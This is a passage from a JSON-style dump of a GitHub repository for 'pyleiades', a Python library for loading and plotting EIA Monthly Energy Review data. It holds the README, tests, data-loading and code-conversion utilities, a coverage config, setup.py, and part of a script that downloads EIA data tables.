MER_TABLES:\n for table_format in TABLE_FORMATS:\n filename = generate_filename(table_title, table_format)\n current_path = os.path.join(DATA_DIR, filename)\n if os.path.isfile(current_path):\n new_path = os.path.join(new_archive_dir, filename)\n os.rename(current_path, new_path)\n print(f'Created the archive directory:\\n\\t{new_archive_dir}')\n\n\n\ndef download_eia_data_table(table_title):\n \"\"\"\n Downloads an table type from the EIA website.\n\n Accesses the EIA website and downloads the given table. Tables are\n downloaded as both CSV files and Excel spreadsheets, and saved to the\n `data` directory.\n\n Parameters\n ––––––––––\n table : str\n The name of the table to be downloaded (e.g. production, consumption,\n imports, exports).\n \"\"\"\n for table_format in TABLE_FORMATS:\n # URL from https://www.eia.gov/totalenergy/data/browser/ download link\n url = f'{BASE_URL}/{table_format}.php?tbl={MER_TABLES[table_title]}'\n filename = generate_filename(table_title, table_format)\n urllib.request.urlretrieve(url, f'{DATA_DIR}/{filename}')\n\ndef main():\n \"\"\"Update the app's data from the EIA website.\"\"\"\n print()\n # Download the files, with printed status updates\n print('Downloading the most recent EIA monthly energy review data:')\n for table_title in MER_TABLES:\n print(f'\\t-Energy {table_title} table')\n download_eia_data_table(table_title)\n print()\n # Include the data in the archive\n include_data_in_archive()\n print('\\nDownload complete.\\n')\n"
},
{
"alpha_fraction": 0.7007113695144653,
"alphanum_fraction": 0.75,
"avg_line_length": 35.22085952758789,
"blob_id": "c2d8bc2390a9642e229349d1b5c6acea00638aca",
"content_id": "4f3efebf157aa63efd9dc1fdf52811f926ffa2e3",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5908,
"license_type": "permissive",
"max_line_length": 312,
"num_lines": 163,
"path": "/README.md",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "# *pyleiades*\n[](https://travis-ci.org/mitchnegus/pyleiades)\n\n## Python Library for EIA Data Examination & Exhibition\n\n###### A tool for creating visuals from historical energy data (e.g. the EIA monthly energy review).\n \nThis tool is designed to provide insightful, aesthetic and more flexible visualizations of the Energy Information Administration (EIA) monthly energy review datasets.\nThe datasets contain information about the sources of energy Americans have relied on for power since the middle of the 20th century. \nThe datasets begin in 1949 with annual energy production, consumption, import, and export values, and extend up until the present. \nMonthly energy datapoints are reported starting in 1973.\n\nThe basic energy sources are reported in the following groups: \n\n###### Fossil Fuels\n* Coal\n* Natural Gas\n* Petroleum\n\n###### Renewables\n* Wind\n* Solar\n* Hydroelectric\n* Geothermal\n* Biomass\n\n###### Nuclear\n* Fission\n\nThe data is published monthly on the [EIA's website](https://www.eia.gov/totalenergy/data/monthly/), and as of March 31st, 2019 records were provided up through December 2018. This package also includes data up to date through the end of 2018, though more recent data can be downloaded using an included script. \n\nAll reported values are in units of quadrillion british thermal units (1.0E15 BTU). Be aware that the datasets may provide [more precision](https://www.eia.gov/totalenergy/data/monthly/dataunits.php) than is published in the PDF reports.\n\n## Installation\n\n_pyleiades_ is hosted through the Python Package Index (PyPI) and can be easily installed using pip.\nFrom the command line, run\n\n```\n$ pip install pyleiades\n```\n\nThe module requires a recent version of Python 3 (3.6 or greater), pandas, and matplotlib, among others.\nIf you run into trouble running the package, try using the Anaconda environment provided in this repo.\nInstall the environment using the command\n\n```\n$ conda env create -f environment.yml\n```\n\nand activate the environment by issuing the command\n\n```\n$ conda activate pyleiades\n```\n\n## Updating\n\nAn archive of EIA Monthly Energy Review datasets is kept in the `pyleiades` data repository. \nThis may not include the most up to date information, and so the package comes with a script to update the available data.\nOnce the package is installed, run \n\n```\n$ update_eia_data.py\n```\n\nfrom the command line to download the most recent data from the EIA website. \n\n## Using the API\n\nThe API is built around two main object types—the `Energy` and `Visual` classes.\n\n### The `Energy` object\n\nTo access the EIA data directly for a certain energy type, use the `Energy` class.\nFor example, the energy consumption data for all renewable energy sources can be accessed with:\n\n```\n>>> from pyleiades import Energy\n>>> renewables = Energy('renewable')\n```\n\nThe resulting `renewables` object stores the complete consumption history within the `energy_data` dataframe attribute.\n\n```\n>>> renewables.energy_data\n date value\n6220 1949 2.973984\n6221 1950 2.977718\n6222 1951 2.958464\n6223 1952 2.940181\n...\n```\n\nThe `date` column gives the reporting date (in the format `YYYY` for full year totals or `YYYY-MM` for monthly totals) and the `value` column gives the consumption amounts (in QBTU) for each date. \n\nEnergy consumption values are the default, however the `Energy` objects can also be used to access production, import and export statistics.\nThe type of statistic can be selected using the `stat_type` keyword argument.\n\n```\n>>> renewables = Energy('renewable', stat_type='production')\n>>> renewables.energy_data\n date value\n6220 1949 1.549262\n6221 1950 1.562307\n6222 1951 1.534669\n6223 1952 1.474369\n```\n\nPerhaps more interesting than the complete history, however, are more sophisticated features of the data, like interval specific totals and extremes.\n\nUsing the `totals` method of an `Energy` object allows the data to be totaled at a specified interval—either monthly, yearly, or cumulatively.\n\n```\n>>> renewables.totals('monthly')\n value\n date\n1973-01 0.403981\n1973-02 0.360900\n1973-03 0.400161\n1973-04 0.380470\n```\n\nNotice that here the monthly data only goes back as far as 1973 (though the `energy_data` attribute showed yearly data for renewable energy dating back to 1949). \nBy default, the `totals` method selects the entire range of available data, though what is available on a monthly vs. yearly basis might be different. \nThis behavior can be overriden by providing start and end dates for some interval as keyword arguments.\nTo only get monthly renewable energy data from 2000 to 2010, this would be:\n\n```\n>>> renewables.totals(freq='monthly', start_date='2000-01', end_date='2009-12')\n value\n date\n2000-01 0.505523\n2000-02 0.498993\n2000-03 0.558474\n2000-04 0.567147\n```\n\nTo get extremes over a dataset interval, use the `maxima` or `minima` methods.\n\n### The `Visual` object\n\nA `Visual` allows the package to create plots of several energy types. \nThe initialization parameters for a `Visual` are similar to those for an `Energy` object. \nA `Visual` can accept a single energy type or a list of energy types, optionally followed by a type of statistic (consumption by default).\n\n```\nvisual = Visual(['coal', 'nuclear', 'renewable'])\n```\n\nThis visual object's methods can then be used to generate any of a variety of visuals. \n\nTo generate a linegraph of energy totals, use the `linegraph` method.\nThe syntax is again similar to that of the `Energy` object's `totals` method.\nHere's an example:\n\n```\nvisual.linegraph(freq='yearly', start_date='1970')\n```\n\n\n\nRun the very simple installed script `pyleiades-demo.py` to see the package in action.\n"
},
{
"alpha_fraction": 0.849056601524353,
"alphanum_fraction": 0.849056601524353,
"avg_line_length": 25.5,
"blob_id": "ac92fb8b019b01c33c0e5190216826a8b89b4de1",
"content_id": "b92928b84efa6936f84e83977bf9461409120a34",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 27,
"num_lines": 2,
"path": "/config.mk",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "# Coverage configuration\nCOVERAGE_CONFIG=.coveragerc\n"
},
{
"alpha_fraction": 0.6181570887565613,
"alphanum_fraction": 0.635668158531189,
"avg_line_length": 43.90076446533203,
"blob_id": "77cd83412224e6e70ee24c46085bf3d52a0f8a21",
"content_id": "a88b38332d34b8ab1ebe94435a9f8bd4ecab014a",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5882,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 131,
"path": "/tests/test_energies.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pytest\nimport numpy as np\nimport pandas as pd\nfrom pyleiades.energies import Energy\n\nclass TestEnergy:\n\n def test_ignore_case(self, testdata):\n nuc_test_data = testdata.iloc[7:].value\n nuc = Energy('Nuclear', data=testdata)\n nuc_energy_data = nuc.energy_data.value\n assert nuc_energy_data.equals(nuc_test_data)\n\n def test_invalid_energy(self, testdata):\n with pytest.raises(ValueError):\n Energy('test', data=testdata)\n\n def test_isolate_energy(self, testdata):\n nuc_test_data = testdata.iloc[7:].value\n nuc = Energy('nuclear', data=testdata)\n nuc_energy_data = nuc.energy_data.value\n assert nuc_energy_data.equals(nuc_test_data)\n\n def test_default_data(self, testdata, testvals):\n nuc_test_data = testdata.iloc[7:].value\n nuc = Energy('nuclear')\n nuc_energy_data = nuc.energy_data.value.values\n assert np.array_equal(nuc_energy_data, nuc_test_data)\n\n def test_monthly_data(self, testdata, testvals):\n nuc_test_data = np.concatenate([testvals[8:20], testvals[21:23]])\n nuc = Energy('nuclear', data=testdata)\n nuc_monthly_data = nuc.monthly_data.value.values\n assert np.array_equal(nuc_monthly_data, nuc_test_data)\n\n def test_yearly_data(self, testdata, testvals):\n nuc_test_data = np.array([testvals[7], testvals[20]])\n nuc = Energy('nuclear', data=testdata)\n nuc_yearly_data = nuc.yearly_data.value.values\n assert np.array_equal(nuc_yearly_data, nuc_test_data)\n\n def test_daterange_bounding_inputs(self, testdata, testvals):\n nuc_test_date_range = np.concatenate([testvals[10:20], testvals[21:22]])\n nuc = Energy('nuclear', data=testdata)\n nuc_date_range = nuc._daterange(nuc.monthly_data, '197303', '197401') \\\n .value.values\n assert np.array_equal(nuc_date_range, nuc_test_date_range)\n\n def test_daterange_bounding_defaults(self, testdata, testvals):\n nuc_test_date_range = np.concatenate([testvals[8:20], testvals[21:23]])\n nuc = Energy('nuclear', data=testdata)\n nuc_date_range = nuc._daterange(nuc.monthly_data, None, None) \\\n .value.values\n assert np.array_equal(nuc_date_range, nuc_test_date_range)\n\n def test_totals_monthly(self, testdata, testvals):\n nuc_test_totals = np.concatenate([testvals[8:20], testvals[21:23]])\n nuc = Energy('nuclear', data=testdata)\n nuc_monthly_totals = nuc.totals('monthly').value.values\n assert np.array_equal(nuc_monthly_totals, nuc_test_totals)\n\n def test_totals_yearly(self, testdata, testvals):\n valarray = testdata.value.values\n nuc_test_totals = np.array([testvals[7], testvals[20]])\n nuc = Energy('nuclear', data=testdata)\n nuc_yearly_totals = nuc.totals('yearly').value.values\n assert np.array_equal(nuc_yearly_totals, nuc_test_totals)\n\n def test_totals_cumulative(self, testdata, testvals):\n nuc_test_total = np.sum(np.array([testvals[7], testvals[20]]))\n nuc = Energy('nuclear', data=testdata)\n nuc_cumulative_total = nuc.totals('cumulative')\n assert nuc_cumulative_total == nuc_test_total\n\n def test_totals_invalid_freq(self, testdata):\n nuc = Energy('nuclear', data=testdata)\n with pytest.raises(ValueError):\n nuc_cumulative_total = nuc.totals('test')\n\n def test_maxima_month(self, testdata):\n nuc_test_max_month, nuc_test_max_val = pd.Period('197310', 'M'), 0.20\n nuc = Energy('nuclear', data=testdata)\n nuc_max_month, nuc_max_val = nuc.maxima('monthly')\n assert nuc_max_month == nuc_test_max_month\n assert nuc_max_val == nuc_test_max_val\n\n def test_minima_month(self, testdata):\n nuc_test_min_month, nuc_test_min_val = pd.Period('197303', 'M'), 0.09\n nuc = Energy('nuclear', data=testdata)\n nuc_min_month, nuc_min_val = nuc.minima('monthly')\n assert nuc_min_month == nuc_test_min_month\n assert nuc_min_val == nuc_test_min_val\n\n def test_extrema_maximum_month(self, testdata):\n nuc_test_max_month, nuc_test_max_val = pd.Period('197310', 'M'), 0.20\n nuc = Energy('nuclear', data=testdata)\n nuc_max_month, nuc_max_val = nuc.extrema('max', 'monthly')\n assert nuc_max_month == nuc_test_max_month\n assert nuc_max_val == nuc_test_max_val\n\n def test_extrema_minimum_month(self, testdata):\n nuc_test_min_month, nuc_test_min_val = pd.Period('197303', 'M'), 0.09\n nuc = Energy('nuclear', data=testdata)\n nuc_min_month, nuc_min_val = nuc.extrema('min', 'monthly')\n assert nuc_min_month == nuc_test_min_month\n assert nuc_min_val == nuc_test_min_val\n\n def test_extrema_maximum_year(self, testdata):\n valarray = testdata.value.values\n nuc_test_max_year, nuc_test_max_val = pd.Period('1973', 'Y'), 1.30\n nuc = Energy('nuclear', data=testdata)\n nuc_max_year, nuc_max_val = nuc.extrema('max', 'yearly')\n assert nuc_max_year == nuc_test_max_year\n assert nuc_max_val == nuc_test_max_val\n\n def test_extrema_minimum_year(self, testdata):\n nuc_test_min_year, nuc_test_min_val = pd.Period('1972', 'Y'), 0.60\n nuc = Energy('nuclear', data=testdata)\n nuc_min_year, nuc_min_val = nuc.extrema('min', 'yearly')\n assert nuc_min_year == nuc_test_min_year\n assert nuc_min_val == nuc_test_min_val\n\n def test_extrema_invalid_freq(self, testdata):\n nuc = Energy('nuclear', data=testdata)\n with pytest.raises(ValueError):\n nuc_cumulative_total = nuc.extrema('max', 'test')\n\n def test_extrema_invalid_ext(self, testdata):\n nuc = Energy('nuclear', data=testdata)\n with pytest.raises(ValueError):\n nuc_cumulative_total = nuc.extrema('test', 'yearly')\n"
},
{
"alpha_fraction": 0.6289865374565125,
"alphanum_fraction": 0.6293408870697021,
"avg_line_length": 35.17948532104492,
"blob_id": "009e5b0f660d0773b9cc1f0bc263c650959361a2",
"content_id": "aa6ce008f1209fccba75ac13e8ef159b7163e5ff",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2874,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 78,
"path": "/pyleiades/utils/load_data.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "\"\"\"\nUtilities for loading EIA Monthly Energy Review (MER) datasets.\n\nFunctions\n–––––––––\nload_dataset\n Loads an EIA MER dataset from a csv file.\n\"\"\"\nimport os\nimport numpy as np\nimport pandas as pd\nfrom glob import glob\nimport pyleiades\nfrom .code_conversion import code_to_name, code_to_period\n\ndef load_dataset(dataset_date=None, dataset_type=None):\n \"\"\"\n Loads an EIA MER dataset from a csv file.\n\n Parameters\n ––––––––––\n dataset_date : str\n The date identifier of the dataset; 'default' and 'newest' are current\n options (the ability to call specific dataset dates to be added).\n dataset_type : str\n The type of the dataset to be selected; can be either 'production',\n 'consumption', 'import', or 'export' (set as None for default dataset).\n\n Returns\n –––––––\n data_df : DataFrame\n Data from the EIA MER dataset; dataframe contains 3 columns: the date,\n the energy quantitity in quadrillion BTUs, and the code denoting energy\n type\n \"\"\"\n # Get the dataset file corresponding to the date identifier given\n if dataset_date is None:\n data_dir = pyleiades.DATA_DIR\n else:\n data_dir = _find_directory_for_date(dataset_date)\n if dataset_type is None:\n dataset_type = 'consumption'\n data_path = _find_dataset(data_dir, dataset_type)\n # Load and process the dataset file\n data_df = pd.read_csv(data_path, na_values='Not Available',\n dtype={'YYYYMM': str})\n data_df = _format_dataset(data_df)\n return data_df\n\ndef _find_directory_for_date(dataset_date):\n \"\"\"Find the archived directory for a given date, if it exists.\"\"\"\n dated_dir = f'{pyleiades.ARCHIVE_DIR}/EIA_MER_{dataset_date}'\n if os.path.isdir(dated_dir):\n return dated_dir\n else:\n raise ValueError(f\"The dataset for the date '{dataset_date}' \"\n \"could not be found.\")\n\ndef _find_dataset(data_dir, dataset_type):\n \"\"\"Find the filename for the given dataset type, if it exists.\"\"\"\n data_filename = f'EIA_MER_{dataset_type}.csv'\n data_path = f'{data_dir}/{data_filename}'\n if os.path.isfile(data_path):\n return data_path\n else:\n raise ValueError(f\"The '{dataset_type}' type dataset could not be \"\n \"found.\")\n\ndef _format_dataset(data_df):\n \"\"\"Format the dataset for further analysis.\"\"\"\n column_mapping = {'YYYYMM': 'date',\n 'Value': 'value',\n 'Column_Order': 'energy_type'}\n data_df = data_df[list(column_mapping.keys())].dropna()\n data_df = data_df.rename(index=str, columns=column_mapping)\n data_df.energy_type = data_df.energy_type.map(code_to_name)\n data_df.date = data_df.date.map(code_to_period)\n return data_df\n"
},
{
"alpha_fraction": 0.6911764740943909,
"alphanum_fraction": 0.6911764740943909,
"avg_line_length": 25.60869598388672,
"blob_id": "5394d67d8911cabc79434176f635ccf003b5c378",
"content_id": "5508eee255302ed4f8a64aa8a0a56d1ac6b26ab5",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 630,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 23,
"path": "/pyleiades/utils/inspection.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "\"\"\"\nUtilities for inspecting and checking data.\n\nFunctions\n–––––––––\ncheck_if_method\n Checks to see if a named argument corresponds to a method of a given class.\n\"\"\"\nimport inspect\nimport types\n\ndef check_if_method(instance, name):\n \"\"\"Check if a given name corresponds to a method of a class instance.\"\"\"\n attribute = inspect.getattr_static(instance, name, None)\n if type(attribute) is types.FunctionType:\n flag = True\n else:\n flag = False\n return flag\n\ndef get_period_freqstr(period):\n \"\"\"Get the period `freqstr` attribute from a Period object.\"\"\"\n return period.freqstr\n"
},
{
"alpha_fraction": 0.5740740895271301,
"alphanum_fraction": 0.5740740895271301,
"avg_line_length": 12.5,
"blob_id": "e30d2c7b0669c1af321b94b7f6c7b1d1e6afae9b",
"content_id": "1115c599adc165cb2c9f3f0466e2c21a4d1cfaf2",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 54,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 4,
"path": "/.coveragerc",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "[run]\nomit =\n # Omit update script\n */update.py\n"
},
{
"alpha_fraction": 0.680134654045105,
"alphanum_fraction": 0.680134654045105,
"avg_line_length": 27.285715103149414,
"blob_id": "5c0ec42a6f7929256b845f48c33106a250c12bde",
"content_id": "35043a055315fcb33fdf64ec1fd8e1764aa4e0ff",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 594,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 21,
"path": "/tests/test_inspection.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom pyleiades.utils.inspection import check_if_method\n\[email protected]\ndef sample_class_instance():\n class X:\n not_a_method = None\n def method(self):\n pass\n return X()\n\nclass TestInspection:\n\n def test_check_if_method_true(self, sample_class_instance):\n assert check_if_method(sample_class_instance, 'method')\n\n def test_check_if_method_false(self):\n assert not check_if_method(sample_class_instance, 'not_a_method')\n\n def test_check_if_method_missing(self):\n assert not check_if_method(sample_class_instance, 'test')\n"
},
{
"alpha_fraction": 0.6216768622398376,
"alphanum_fraction": 0.6349693536758423,
"avg_line_length": 33.92856979370117,
"blob_id": "ade00d6ad886586862b4b38fceebcc0ce68166d2",
"content_id": "3b09be5bd6eb092fce80b9048dd2f80c75a0d8bc",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 978,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 28,
"path": "/tests/test_load_data.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom pyleiades.utils import load_data\n\nclass TestLoadDataset:\n\n def test_load_dataset_default(self):\n test_df = load_data.load_dataset()\n assert len(test_df) == 23\n assert test_df.value.iloc[0] == 1.1\n assert list(test_df.columns) == ['date', 'value', 'energy_type']\n\n def test_load_dataset_specific_date(self):\n test_df = load_data.load_dataset(dataset_date='test')\n assert len(test_df) == 2\n assert test_df.value.iloc[0] == 7.5\n\n def test_load_dataset_specific_type(self):\n test_df = load_data.load_dataset(dataset_type='production')\n assert len(test_df) == 2\n assert test_df.value.iloc[0] == 2.5\n\n def test_load_dataset_invalid_date(self):\n with pytest.raises(ValueError):\n load_data.load_dataset(dataset_date='fail')\n\n def test_load_dataset_invalid_type(self):\n with pytest.raises(ValueError):\n load_data.load_dataset(dataset_type='fail')\n"
},
{
"alpha_fraction": 0.5719314813613892,
"alphanum_fraction": 0.585777997970581,
"avg_line_length": 31.037593841552734,
"blob_id": "5752c8977b5e8a31cdb0a8d1bf4c49ea6cb169e1",
"content_id": "9ea4f618639715a147c14ac8d10b7d5ff99c9904",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4381,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 133,
"path": "/pyleiades/utils/code_conversion.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "\"\"\"\nUtilities for converting EIA dataset codes into meaningful information.\n\nFunctions\n–––––––––\nname_to_code\n Converts energy names into EIA energy codes.\ndate_to_code\n Converts date string into EIA data code.\n\"\"\"\nimport datetime\nimport pandas as pd\n\nEIA_CODES = {1: 'coal',\n 2: 'natural gas',\n 3: 'petroleum',\n 4: 'fossil fuel',\n 5: 'nuclear',\n 6: 'hydro',\n 7: 'geothermal',\n 8: 'solar',\n 9: 'wind',\n 10: 'biomass',\n 11: 'renewable',\n 12: 'primary'}\n\ndef code_to_name(code):\n \"\"\"\n Convert an EIA dataset numeric code to its corresponding energy source name.\n\n Parameters\n ––––––––––\n code : int\n The code corresponding to a specific energy source.;\n\n Returns\n –––––––\n name : str\n The name of an EIA energy or energy group.\n \"\"\"\n if code not in EIA_CODES:\n raise KeyError(f\"Code '{code}' does not correspond to an EIA energy \"\n \"code.\")\n else:\n name = EIA_CODES[code]\n return name\n\ndef code_to_period(code):\n \"\"\"\n Convert an EIA date code (YYYYMM) into a pandas period.\n\n EIA date codes are given as 'YYYYMM'. The month value can be either 1-12\n for the standard months, or 13 for a yearly total. This function processes\n the date code and outputs a pandas period object matching the date code.\n\n Parameters\n ––––––––––\n code : str\n The six digit date code to be converted into a pandas period.\n\n Returns\n –––––––\n period : Period object\n The pandas period object corresponding to the given date code.\n \"\"\"\n month_code = int(code[-2:])\n if month_code == 13:\n period = pd.Period(code[:-2], 'Y')\n elif month_code in range(1,13):\n period = pd.Period(code, 'M')\n else:\n raise ValueError(f\"Date code '{code}' is not a valid date.\")\n return period\n\ndef parse_input_date(date):\n \"\"\"\n Process an input date to a format that can be compared with the data.\n\n Parses a date given in a variety of string formats by a user into a pandas\n period object. This period object can be compared easily against the period\n objects of the dataset.\n\n Parameters\n ––––––––––\n date : str\n A date, given in the format 'YYYY','YYYYMM', 'YYYY-MM', or 'MM-YYYY'.\n Dashes can be substituted for periods, underscores, or forward slashes.\n\n Returns\n –––––––\n period : Period object\n The pandas period object corresponding to the input energy.\n \"\"\"\n bad_format_err_msg = (f'Date \"{date}\" was not given in an acceptable '\n 'format; try formatting date as \"YYYYMM\".')\n acceptable_separators = ['-', '.', '/', '_']\n\n # Convert date to code\n if len(date) == 4:\n # Only a year was given, consider the whole year\n date += '13'\n elif len(date) == 7:\n for separator in acceptable_separators[1:]:\n date = date.replace(separator, acceptable_separators[0])\n date_list = date.split(acceptable_separators[0])\n if len(date_list) != 2:\n raise ValueError(bad_format_err_msg.format(date))\n # Check whether the first or second entry is the year\n if len(date_list[0]) == 4:\n date = ''.join(date_list)\n elif len(date_list[1]) == 4:\n date = ''.join(date_list[::-1])\n else:\n raise ValueError(bad_format_err_msg.format(date))\n elif len(date) != 6:\n raise ValueError(bad_format_err_msg.format(date))\n\n # Check reasonability of date provided\n try:\n # The date must be able to be expressed numerically\n int(date)\n except:\n raise ValueError(bad_format_err_msg.format(date))\n year = int(date[:4])\n month = int(date[4:])\n if year < 1900 or year > datetime.datetime.now().year:\n raise ValueError('Data only exists from the middle of the 20th '\n 'century to the present.')\n if month > 13 or month < 1: # 13 denotes full year sum\n raise ValueError('A month must be given as a number 1-12 (or use 13 '\n 'to denote a full year.')\n period = code_to_period(date)\n return period\n"
},
{
"alpha_fraction": 0.6439674496650696,
"alphanum_fraction": 0.6561806201934814,
"avg_line_length": 41.88888931274414,
"blob_id": "e48395e5d2680a26ad7651c65cdba3bbf4f46551",
"content_id": "d127c27e81d420d20c0a5d5e670a517d0e6bf060",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2702,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 63,
"path": "/tests/test_visuals.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pytest\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom pyleiades.visuals import Visual\n\nclass TestVisual:\n\n def test_initialze_with_string(self, testdata):\n nuc_test_data = testdata.iloc[7:].value\n visual = Visual('nuclear', data=testdata)\n nuc_energy_data = visual.energies[0].energy_data.value\n assert 'nuclear' == visual.energies[0].energy_type\n assert nuc_energy_data.equals(nuc_test_data)\n\n def test_initialze_with_list(self, testdata):\n nuc_test_data = testdata.iloc[7:].value\n visual = Visual(['nuclear', 'coal'], data=testdata)\n nuc_energy_data = visual.energies[0].energy_data.value\n assert 'nuclear' == visual.energies[0].energy_type\n assert 'coal' == visual.energies[1].energy_type\n assert nuc_energy_data.equals(nuc_test_data)\n\n def test_initialze_invalid(self, testdata):\n with pytest.raises(ValueError):\n visual = Visual(123, data=testdata)\n\n def test_include_energy(self, testdata):\n nuc_test_data = testdata.iloc[7:].value\n visual = Visual(data=testdata)\n visual.include_energy('nuclear', 'coal')\n nuc_energy_data = visual.energies[0].energy_data.value\n assert 'nuclear' == visual.energies[0].energy_type\n assert 'coal' == visual.energies[1].energy_type\n assert nuc_energy_data.equals(nuc_test_data)\n\n def test_linegraph_no_energies(self, testdata):\n visual = Visual(data=testdata)\n with pytest.raises(RuntimeError):\n ax = visual.linegraph()\n\n def test_linegraph_default_totals(self, testdata, testvals):\n nuc_test_totals = np.array([testvals[7], testvals[20]])\n visual = Visual(data=testdata)\n visual.include_energy('nuclear')\n ax = visual.linegraph()\n nuc_default_totals = ax.lines[0].get_xydata().T[1]\n assert np.array_equal(nuc_default_totals, nuc_test_totals)\n\n def test_linegraph_yearly_totals(self, testdata, testvals):\n nuc_test_totals = np.array([testvals[7], testvals[20]])\n visual = Visual(data=testdata)\n visual.include_energy('nuclear')\n ax = visual.linegraph(freq='yearly')\n nuc_yearly_totals = ax.lines[0].get_xydata().T[1]\n assert np.array_equal(nuc_yearly_totals, nuc_test_totals)\n\n def test_linegraph_monthly_totals(self, testdata, testvals):\n nuc_test_totals = np.concatenate([testvals[8:20], testvals[21:23]])\n visual = Visual(data=testdata)\n visual.include_energy('nuclear')\n ax = visual.linegraph(freq='monthly')\n nuc_monthly_totals = ax.lines[0].get_xydata().T[1]\n assert np.array_equal(nuc_monthly_totals, nuc_test_totals)\n"
},
{
"alpha_fraction": 0.7678571343421936,
"alphanum_fraction": 0.7678571343421936,
"avg_line_length": 55,
"blob_id": "f3aa617db9b6dd72bda5c5489b747bdb8874088d",
"content_id": "32690c624f26695474658e4b847e394fa5b3d100",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 56,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 1,
"path": "/pyleiades/utils/__init__.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "\"\"\"General utilities for project and data management\"\"\"\n"
},
{
"alpha_fraction": 0.7322993874549866,
"alphanum_fraction": 0.7336480021476746,
"avg_line_length": 33.488372802734375,
"blob_id": "e170e0f08bfc217dd68f3e4a581fe62fb63f5796",
"content_id": "dc53360ddf1a0b98306fe4ba2ca5fd31fae0d405",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1483,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 43,
"path": "/setup.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\n\"\"\"\npyleiades: Python Library for EIA Data Examination & Exhibition\n\nTools to use with the EIA Monthly Energy Review datasets. This package provides\nan API for performing more sophisticated examination and visualization of the\nEnergy Information Administration (EIA) Monthly Energy Review (MER) datasets.\n\nData can be accessed directly at the EIA website:\n https://www.eia.gov/totalenergy/data/browser/\n\"\"\"\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nfrom os import path\n\npackage_name = 'pyleiades'\nproject_dir = path.abspath(path.dirname(__file__))\npackage_dir = path.join(project_dir, package_name)\n# Read the contents of the _version file\nwith open(path.join(package_dir, '_version')) as version_file:\n version = version_file.read().strip()\n# Read the contents of the README file\nwith open(path.join(project_dir, 'README.md'), encoding='utf-8') as readme_file:\n long_description = readme_file.read()\n\nsetup(\n name=package_name,\n version=version,\n description='An API for examing the EIA Monthly Energy Review datasets.',\n author='Mitch Negus',\n author_email='[email protected]',\n license='FreeBSD',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/mitchnegus/pyleiades',\n packages=['pyleiades', 'pyleiades.utils'],\n scripts=['scripts/update_eia_data.py', 'scripts/pyleiades-demo.py'],\n include_package_data=True\n)\n"
},
{
"alpha_fraction": 0.5799798965454102,
"alphanum_fraction": 0.6302816867828369,
"avg_line_length": 28.235294342041016,
"blob_id": "c2feb2c16d29ac60095231666bfd3b20b00a1125",
"content_id": "e9f796a75c0e50b7021b4343409654c891935046",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1988,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 68,
"path": "/tests/test_code_conversion.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
